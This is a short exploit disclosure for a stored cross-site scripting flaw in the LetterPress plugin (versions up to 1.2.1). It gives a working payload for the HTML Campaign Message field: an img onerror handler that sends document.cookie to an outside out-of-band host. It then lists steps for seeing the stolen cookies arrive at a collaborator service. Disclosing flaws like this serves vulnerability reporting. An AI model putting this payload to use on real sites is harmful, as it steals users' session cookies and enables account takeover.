Description:
In LetterPress plugin <= 1.2.1 is vulnerable to Cookie Stealing Vulnerability. An attacker can able to steal the cookies by injecting the JavaScript code.

Exploit:
1. In LetterPress plugin navigate to Add Campaign and insert the code “<img src=x onerror=”location.href=’https://masdctnkppwsmnzsddestjmlhih74l9tt.oast.fun?c=’+ document.cookie”>” in HTML Campaign Message input field and click on Save Campaign.
2. View the campaign and monitor the requests & responses in 3rd party site (Ex: burpcollaborator)
3. The cookies values are passed in the GET parameter of 3rd party site.